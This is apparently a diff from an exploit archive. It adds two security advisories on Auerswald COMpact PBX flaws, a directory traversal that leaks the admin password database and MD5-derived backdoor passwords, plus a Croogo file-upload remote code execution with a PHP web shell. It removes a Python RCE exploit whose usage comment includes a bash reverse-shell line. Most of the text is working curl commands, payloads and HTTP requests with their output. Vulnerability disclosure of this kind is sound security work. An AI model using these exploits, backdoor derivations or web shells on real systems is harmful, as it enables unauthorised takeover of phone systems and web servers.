|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
|
||||||
|
'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
|
||||||
|
'&pageindex=1'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: audio/x-wav; charset=
|
||||||
|
Content-Length: 132192
|
||||||
|
Content-disposition: attachment; filename="alarm1.wav"
|
||||||
|
[...]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
It was found that the PBX allows directory traversal with the string
|
||||||
|
"../", so the file "/etc/passwd" can be accessed as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
|
||||||
|
'https://192.168.1.2/wartemusik_verwaltung_play?'\
|
||||||
|
'fileName=../../etc/passwd&pageindex='
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
[...]
|
||||||
|
Content-Length: 113
|
||||||
|
Content-disposition: attachment; filename="../../etc/passwd"
|
||||||
|
[...]
|
||||||
|
|
||||||
|
root::0:0:root:/root:/bin/sh
|
||||||
|
netstorage::1:1::/data/ftpd:/bin/false
|
||||||
|
web::2:2::/opt/auerswald/lighttpd:/bin/false
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The same issue is present in the function for managing logos. A regular
|
||||||
|
request for the file "logo1.jpg" is shown below:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
|
||||||
|
'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
X-XSS-Protection: 1
|
||||||
|
Content-Type: image/jpg; charset=UTF-8
|
||||||
|
Content-Length: 13986
|
||||||
|
Content-disposition: attachment; filename="logo1.jpg"
|
||||||
|
[...]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
In a similar fashion as before, the file "/etc/passwd" can be accessed:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
|
||||||
|
'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
[...]
|
||||||
|
|
||||||
|
root::0:0:root:/root:/bin/sh
|
||||||
|
netstorage::1:1::/data/ftpd:/bin/false
|
||||||
|
web::2:2::/opt/auerswald/lighttpd:/bin/false
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
For attackers, an interesting file is the SQLite[2] database file
|
||||||
|
"/data/db/pbx4.db". It can be downloaded as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
|
||||||
|
'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
|
||||||
|
> pbx4.db
|
||||||
|
|
||||||
|
% Total % Received % Xferd Average Speed Time Time Time Current
|
||||||
|
Dload Upload Total Spent Left Speed
|
||||||
|
100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
This file contains the password for the highly privileged "Admin" user
|
||||||
|
account:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ sqlite3 pbx4.db
|
||||||
|
SQLite version 3.27.2 2019-02-25 16:06:06
|
||||||
|
Enter ".help" for usage hints.
|
||||||
|
|
||||||
|
sqlite> .tables
|
||||||
|
DbFileVersion PbxMisc
|
||||||
|
|
||||||
|
sqlite> select * from PbxMisc;
|
||||||
|
[...]
|
||||||
|
AdminPasswdHash|
|
||||||
|
AdminLogin|Admin
|
||||||
|
AdminPin|43214321
|
||||||
|
AdminPasswd|S3kr1t!
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The username and password can then be used to log into the web
|
||||||
|
application:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --user 'Admin:S3kr1t!' --anyauth --include \
|
||||||
|
https://192.168.1.2/tree
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[{"login":3,"userId":0,"userName":"",[...]}]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Checking the access level reveals the new privilege:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Administrator"}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The user "Admin", in contrast to regular administrative users
|
||||||
|
("sub-admin"), can access more functions and for example apply firmware
|
||||||
|
updates.
|
||||||
|
|
||||||
|
Workaround
|
||||||
|
==========
|
||||||
|
|
||||||
|
Disable or restrict access to the web-based management if possible.
|
||||||
|
|
||||||
|
|
||||||
|
Fix
|
||||||
|
===
|
||||||
|
|
||||||
|
Upgrade to a firmware version which corrects this vulnerability.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk
|
||||||
|
=============
|
||||||
|
|
||||||
|
Attackers who already have acquired administrative access as a so-called
|
||||||
|
"sub-admin" can download a database file and access the password for the
|
||||||
|
highly privileged "Admin" account. This account can use more functions and
|
||||||
|
is allowed to apply firmware updates.
|
||||||
|
|
||||||
|
On the one hand, exploiting this vulnerability already requires
|
||||||
|
administrative access. On the other hand, attackers can reach
|
||||||
|
high-privileged access to the PBX and use functions not available to
|
||||||
|
"sub-admin" users, like firmware updates. All in all, this vulnerability
|
||||||
|
is therefore rated to have a medium risk potential.
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
========
|
||||||
|
|
||||||
|
2021-08-26 Vulnerability identified
|
||||||
|
2021-09-01 Customer approved disclosure to vendor
|
||||||
|
2021-09-10 Vendor notified
|
||||||
|
2021-09-10 CVE ID requested
|
||||||
|
2021-09-10 CVE ID assigned
|
||||||
|
2021-10-05 Vendor provides access to device with fixed firmware
|
||||||
|
2021-10-11 Vendor provides fixed firmware
|
||||||
|
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
|
||||||
|
2021-12-06 Advisory published
|
||||||
|
|
||||||
|
|
||||||
|
References
|
||||||
|
==========
|
||||||
|
|
||||||
|
[1] https://curl.se
|
||||||
|
[2] https://www.sqlite.org
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting GmbH
|
||||||
|
=======================
|
||||||
|
|
||||||
|
RedTeam Pentesting offers individual penetration tests performed by a
|
||||||
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||||
|
company networks or products are uncovered and can be fixed immediately.
|
||||||
|
|
||||||
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||||
|
share its knowledge and enhance the public knowledge with research in
|
||||||
|
security-related areas. The results are made available as public
|
||||||
|
security advisories.
|
||||||
|
|
||||||
|
More information about RedTeam Pentesting can be found at:
|
||||||
|
https://www.redteam-pentesting.de/
|
||||||
|
|
||||||
|
|
||||||
|
Working at RedTeam Pentesting
|
||||||
|
=============================
|
||||||
|
|
||||||
|
RedTeam Pentesting is looking for penetration testers to join our team
|
||||||
|
in Aachen, Germany. If you are interested please visit:
|
||||||
|
https://www.redteam-pentesting.de/jobs/
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||||
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||||
|
52068 Aachen https://www.redteam-pentesting.de
|
||||||
|
Germany Registergericht: Aachen HRB 14004
|
||||||
|
Geschäftsführer: Patrick Hof, Jens Liebchen
|
350
exploits/hardware/remote/50569.txt
Normal file
350
exploits/hardware/remote/50569.txt
Normal file
|
@ -0,0 +1,350 @@
|
||||||
|
# Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors
|
||||||
|
# Date: 06/12/2021
|
||||||
|
# Exploit Author: RedTeam Pentesting GmbH
|
||||||
|
|
||||||
|
Advisory: Auerswald COMpact Multiple Backdoors
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting discovered several backdoors in the firmware for the
|
||||||
|
Auerswald COMpact 5500R PBX. These backdoors allow attackers who are
|
||||||
|
able to access the web-based management application full administrative
|
||||||
|
access to the device.
|
||||||
|
|
||||||
|
|
||||||
|
Details
|
||||||
|
=======
|
||||||
|
|
||||||
|
Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
|
||||||
|
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)
|
||||||
|
Fixed Versions: 8.2B, 4.0T
|
||||||
|
Vulnerability Type: Backdoor
|
||||||
|
Security Risk: high
|
||||||
|
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
|
||||||
|
Vendor Status: fixed version released
|
||||||
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007
|
||||||
|
Advisory Status: published
|
||||||
|
CVE: CVE-2021-40859
|
||||||
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859
|
||||||
|
|
||||||
|
|
||||||
|
Introduction
|
||||||
|
============
|
||||||
|
|
||||||
|
"Fully modular VoIP appliance for more efficient communication processes
|
||||||
|
With the COMpact 5500R, you are originally equipped for everyday
|
||||||
|
business - now and in the future.
|
||||||
|
|
||||||
|
The fully modular architecture with 80 IP channels and all the functions
|
||||||
|
of a large ITC server allows up to 112 subscribers and thus scales with
|
||||||
|
your company.
|
||||||
|
|
||||||
|
Continuous maintanance and expansion of the system software makes this
|
||||||
|
versatile IP server a future-proof investment in any business
|
||||||
|
communication."
|
||||||
|
|
||||||
|
(from the vendor's homepage)
|
||||||
|
|
||||||
|
|
||||||
|
More Details
|
||||||
|
============
|
||||||
|
|
||||||
|
Two backdoor passwords were found in the firmware of the COMpact 5500R
|
||||||
|
PBX. One backdoor password is for the secret user "Schandelah", the
|
||||||
|
other can be used for the highest-privileged user "Admin". No way was
|
||||||
|
discovered to disable these backdoors.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
================
|
||||||
|
|
||||||
|
The firmware for the COMpact 5500R can be downloaded from the vendor's
|
||||||
|
homepage[1]. The following details refer to firmware version 7.8A, but
|
||||||
|
the latest firmware at the time of writing (8.0B) is affected as well.
|
||||||
|
|
||||||
|
Inspecting the downloaded file reveals that it is compressed and can be
|
||||||
|
extracted with the program "gunzip":
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ file 7_8A_002_COMpact5500.rom
|
||||||
|
7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23
|
||||||
|
15:04:43 2020, from Unix, original size 196976698
|
||||||
|
|
||||||
|
$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz
|
||||||
|
|
||||||
|
$ gunzip 7_8A_002_COMpact5500.gz
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Analysing the resulting file again shows that it is an image file in the
|
||||||
|
format required by the bootloader "Das U-Boot"[2], a popular bootloader
|
||||||
|
for embedded devices:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ file 7_8A_002_COMpact5500.rom
|
||||||
|
|
||||||
|
7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,
|
||||||
|
Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38
|
||||||
|
2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0
|
||||||
|
xCECA93E8, Data CRC: 0x99E65DF1
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The program "dumpimage" (included with u-boot) can be used to list the
|
||||||
|
partitions in the image file:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ dumpimage -l 7_8A_002_COMpact5500.rom
|
||||||
|
Image Name:
|
||||||
|
CP5500 125850
|
||||||
|
Created:
|
||||||
|
Wed Sep 23 17:04:38 2020
|
||||||
|
Image Type:
|
||||||
|
ARM Linux Multi-File Image (uncompressed)
|
||||||
|
Data Size:
|
||||||
|
196976634 Bytes = 192359.99 KiB = 187.85 MiB
|
||||||
|
Load Address: 00000000
|
||||||
|
Entry Point: 00000000
|
||||||
|
Contents:
|
||||||
|
Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB
|
||||||
|
Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The larger partition then was extracted into the file "rootfs" as
|
||||||
|
follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Contained in the file is an ext2-compatible file system, which was
|
||||||
|
mounted at "/mnt" and inspected:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ file rootfs
|
||||||
|
|
||||||
|
rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-
|
||||||
|
f302d7f20ef1, volume name "7.8A_002_125850."
|
||||||
|
|
||||||
|
$ sudo mount -o loop,ro rootfs /mnt
|
||||||
|
|
||||||
|
$ cat /mnt/etc/passwd
|
||||||
|
root::0:0:root:/root:/bin/sh
|
||||||
|
netstorage::1:1::/data/ftpd:/bin/false
|
||||||
|
web::2:2::/opt/auerswald/lighttpd:/bin/false
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The PBX runs the web server lighttpd[3], the configuration files can be
|
||||||
|
found in the folder "/opt/auerswald/lighttpd". The web server forwards
|
||||||
|
most requests via FastCGI to the program "/opt/auerswald/web/webserver".
|
||||||
|
This program can then be analysed, for example using the reverse
|
||||||
|
engineering program Ghidra[4].
|
||||||
|
|
||||||
|
The manual for the PBX reveals that in order to manage the device, users
|
||||||
|
need to log in with the username "sub-admin". When this string is
|
||||||
|
searched within the program in Ghidra, the function which checks
|
||||||
|
passwords on login can be identified.
|
||||||
|
|
||||||
|
It can easily be seen that besides the username "sub-admin" the function
|
||||||
|
also checks for the hard-coded username "Schandelah", which is the
|
||||||
|
village of Auerswald's headquarter. Further analysis revealed that the
|
||||||
|
corresponding password for this username is derived by concatenating the
|
||||||
|
PBX's serial number, the string "r2d2" and the current date, hashing it
|
||||||
|
with the MD5 hash algorithm and taking the first seven lower-case hex
|
||||||
|
chars of the result.
|
||||||
|
|
||||||
|
All data needed to derive the password can be accessed without
|
||||||
|
authentication by requesting the path "/about_state", which is also used
|
||||||
|
on the website the PBX redirects users to who abort the password prompt
|
||||||
|
(shortened and formatted to increase readability):
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include https://192.168.1.2/about_state
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{
|
||||||
|
"pbx": "COMpact 5500R",
|
||||||
|
"pbxType": 35,
|
||||||
|
"pbxId": 0,
|
||||||
|
"version": "Version 7.8A - Build 002 ",
|
||||||
|
"serial": "1234123412",
|
||||||
|
"date": "30.08.2021",
|
||||||
|
[...]
|
||||||
|
}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The password can be derived as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
|
||||||
|
1432d89
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
This password can then be used for authentication:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include --user 'Schandelah:1432d89' --anyauth \
|
||||||
|
https://192.168.1.2/tree
|
||||||
|
|
||||||
|
HTTP/1.1 302 Found
|
||||||
|
Location: /statics/html/page_servicetools.html
|
||||||
|
Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Next, the endpoint "/logstatus_state" can be queried using the returned
|
||||||
|
session ID to check the access level:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
% curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
X-XSS-Protection: 1
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Haendler"}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The returned access level is "Haendler" (reseller). After login, the web
|
||||||
|
server redirects to a special service page at the path
|
||||||
|
"/statics/html/page_servicetools.html". Among other things, it allows to
|
||||||
|
download a backup of all data on the device, configure audio recording
|
||||||
|
and reset the password, PIN and token for the user "Admin". Accessing
|
||||||
|
regular administrative functions is not possible directly with this user
|
||||||
|
account.
|
||||||
|
|
||||||
|
When inspecting the password checking function, a second backdoor can be
|
||||||
|
found. When the username "Admin" is specified, the given password is
|
||||||
|
tested against the configured password as well as a password derived in
|
||||||
|
a similar way from the PBX's serial number, the string "r2d2", the
|
||||||
|
current date and the configured language. The MD5 hash is taken and the
|
||||||
|
specified password is tested against the first seven characters of the
|
||||||
|
lower case hexadecimal hash.
|
||||||
|
|
||||||
|
The backdoor password for the "Admin" user can be calculated as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'
|
||||||
|
92fcdd9
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The server returns a session ID for that password and the username
|
||||||
|
"Admin":
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --user 'Admin:92fcdd9' --anyauth --include \
|
||||||
|
https://192.168.1.2/tree
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[{"login":3,"userId":0,"userName":"",[...]}]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Checking the access level of the session reveals the status
|
||||||
|
"Administrator":
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Administrator"}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
Workaround
|
||||||
|
==========
|
||||||
|
|
||||||
|
Disable or restrict access to the web-based management interface if
|
||||||
|
possible.
|
||||||
|
|
||||||
|
|
||||||
|
Fix
|
||||||
|
===
|
||||||
|
|
||||||
|
Upgrade to a firmware version which corrects this vulnerability.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk
|
||||||
|
=============
|
||||||
|
|
||||||
|
By inspecting the firmware for the COMpact 5500R PBX, attackers can
|
||||||
|
easily discover two backdoor passwords. One password is for the secret
|
||||||
|
user account with the username "Schandelah", the other works as an
|
||||||
|
alternative password for the user "Admin". Using the backdoor, attackers
|
||||||
|
are granted access to the PBX with the highest privileges, enabling them
|
||||||
|
to completely compromise the device. The passwords are derived from the
|
||||||
|
serial number, the current date and the configured language.
|
||||||
|
|
||||||
|
The backdoor passwords are not documented. They secretly coexist with a
|
||||||
|
documented password recovery function supported by the vendor. No way
|
||||||
|
was found to disable the backdoor access.
|
||||||
|
|
||||||
|
All information needed to derive the passwords can be requested over the
|
||||||
|
network without authentication, so attackers only require network access
|
||||||
|
to the web-based management interface.
|
||||||
|
|
||||||
|
Due to the ease of exploitation and severe consequences, the backdoor
|
||||||
|
passwords are rated as a high risk.
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
========
|
||||||
|
|
||||||
|
2021-08-26 Vulnerability identified
|
||||||
|
2021-09-01 Customer approved disclosure to vendor
|
||||||
|
2021-09-10 Vendor notified
|
||||||
|
2021-09-10 CVE ID requested
|
||||||
|
2021-09-10 CVE ID assigned
|
||||||
|
2021-10-05 Vendor provides access to device with fixed firmware
|
||||||
|
2021-10-11 Vendor provides fixed firmware
|
||||||
|
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
|
||||||
|
2021-12-06 Advisory published
|
||||||
|
|
||||||
|
|
||||||
|
References
|
||||||
|
==========
|
||||||
|
|
||||||
|
[1] https://www.auerswald.de/de/support/download/firmware-compact-5500
|
||||||
|
[2] https://www.denx.de/wiki/U-Boot
|
||||||
|
[3] https://www.lighttpd.net
|
||||||
|
[4] https://ghidra-sre.org
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting GmbH
|
||||||
|
=======================
|
||||||
|
|
||||||
|
RedTeam Pentesting offers individual penetration tests performed by a
|
||||||
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||||
|
company networks or products are uncovered and can be fixed immediately.
|
||||||
|
|
||||||
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||||
|
share its knowledge and enhance the public knowledge with research in
|
||||||
|
security-related areas. The results are made available as public
|
||||||
|
security advisories.
|
||||||
|
|
||||||
|
More information about RedTeam Pentesting can be found at:
|
||||||
|
https://www.redteam-pentesting.de/
|
||||||
|
|
||||||
|
|
||||||
|
Working at RedTeam Pentesting
|
||||||
|
=============================
|
||||||
|
|
||||||
|
RedTeam Pentesting is looking for penetration testers to join our team
|
||||||
|
in Aachen, Germany. If you are interested please visit:
|
||||||
|
https://www.redteam-pentesting.de/jobs/
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||||
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||||
|
52068 Aachen https://www.redteam-pentesting.de
|
||||||
|
Germany Registergericht: Aachen HRB 14004
|
||||||
|
Geschäftsführer: Patrick Hof, Jens Liebchen
|
|
@ -1,65 +0,0 @@
|
||||||
# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
|
|
||||||
# Date: November 30, 2021
|
|
||||||
# Exploit Author: Nicole Daniella Murillo Mejias
|
|
||||||
# Version: Advanced Comment System 1.0
|
|
||||||
# Tested on: Linux
|
|
||||||
|
|
||||||
#!/usr/bin/env python3
|
|
||||||
|
|
||||||
# DESCRIPTION:
|
|
||||||
# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
|
|
||||||
# response is filtered by the randomly generated alphanumeric string and only command output
|
|
||||||
# is displayed.
|
|
||||||
#
|
|
||||||
# USAGE:
|
|
||||||
# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
|
|
||||||
# If any special characters are used, they should be quoted with single quotes.
|
|
||||||
#
|
|
||||||
# Example:
|
|
||||||
#
|
|
||||||
# python3 acspoc.py uname -a
|
|
||||||
# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
|
|
||||||
|
|
||||||
import sys
|
|
||||||
import base64
|
|
||||||
import requests
|
|
||||||
import random
|
|
||||||
|
|
||||||
def generate_string(size):
|
|
||||||
str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
|
||||||
return ''.join(random.choice(str) for i in range(size))
|
|
||||||
|
|
||||||
def exploit(cmd):
|
|
||||||
|
|
||||||
# TODO: Change the URL to the target host
|
|
||||||
url = 'http://127.0.0.1/advanced_comment_system/index.php'
|
|
||||||
|
|
||||||
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
|
|
||||||
|
|
||||||
encoded_cmd = base64.b64encode(cmd)
|
|
||||||
|
|
||||||
delimiter = generate_string(6).encode()
|
|
||||||
|
|
||||||
body = b'ACS_path=php://input%00&cbcmd='
|
|
||||||
body += encoded_cmd
|
|
||||||
body += b'&<?php echo " '
|
|
||||||
body += delimiter
|
|
||||||
body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'
|
|
||||||
|
|
||||||
try:
|
|
||||||
result = requests.post(url=url, headers=headers, data=body)
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
print("Keyboard interrupt detected.")
|
|
||||||
sys.exit()
|
|
||||||
|
|
||||||
if f'{delimiter.decode()}: ' in result.text:
|
|
||||||
position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")
|
|
||||||
|
|
||||||
if len(result.text[position:]) > 0:
|
|
||||||
print(result.text[position:])
|
|
||||||
else:
|
|
||||||
print(f"No output from command '{cmd.decode()}'")
|
|
||||||
print(f"Response size from target host: {len(result.text)} bytes")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
exploit(' '.join(sys.argv[1:]).encode())
|
|
72
exploits/php/webapps/50570.txt
Normal file
72
exploits/php/webapps/50570.txt
Normal file
|
@ -0,0 +1,72 @@
|
||||||
|
# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
|
||||||
|
# Date: 05/12/2021
|
||||||
|
# Exploit Author: Deha Berkin Bir
|
||||||
|
# Vendor Homepage: https://croogo.org/
|
||||||
|
# Software Link: https://downloads.croogo.org/v3.0.2.zip
|
||||||
|
# Version: 3.0.2
|
||||||
|
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
|
||||||
|
|
||||||
|
==> Tutorial <==
|
||||||
|
|
||||||
|
1- Login with your privileged account.
|
||||||
|
2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
|
||||||
|
3- Click the 'New Attachment' button.
|
||||||
|
4- Choose a malicious php script and upload it.
|
||||||
|
|
||||||
|
########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
|
||||||
|
<?php
|
||||||
|
$command = shell_exec('netstat -an');
|
||||||
|
echo "<pre>$command</pre>";
|
||||||
|
?>
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
5- Click on the URL of malicious php script you uploaded.
|
||||||
|
6- The malicious PHP script will be executed.
|
||||||
|
|
||||||
|
|
||||||
|
==> HTTP Request (File Upload) <==
|
||||||
|
|
||||||
|
POST /admin/file-manager/attachments/add HTTP/1.1
|
||||||
|
Host: (HOST)
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694
|
||||||
|
Content-Length: 976
|
||||||
|
Origin: http://(HOST)
|
||||||
|
Connection: close
|
||||||
|
Referer: http://(HOST)/admin/file-manager/attachments/add
|
||||||
|
Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
|
||||||
|
-----------------------------7028631106888453201670373694
|
||||||
|
Content-Disposition: form-data; name="_method"
|
||||||
|
|
||||||
|
POST
|
||||||
|
-----------------------------7028631106888453201670373694
|
||||||
|
Content-Disposition: form-data; name="_csrfToken"
|
||||||
|
|
||||||
|
bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb
|
||||||
|
-----------------------------7028631106888453201670373694
|
||||||
|
Content-Disposition: form-data; name="file"; filename="malicious.php"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
<?php
|
||||||
|
$command = shell_exec('netstat -an');
|
||||||
|
echo "<pre>$command</pre>";
|
||||||
|
?>
|
||||||
|
|
||||||
|
-----------------------------7028631106888453201670373694
|
||||||
|
Content-Disposition: form-data; name="_Token[fields]"
|
||||||
|
|
||||||
|
16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
|
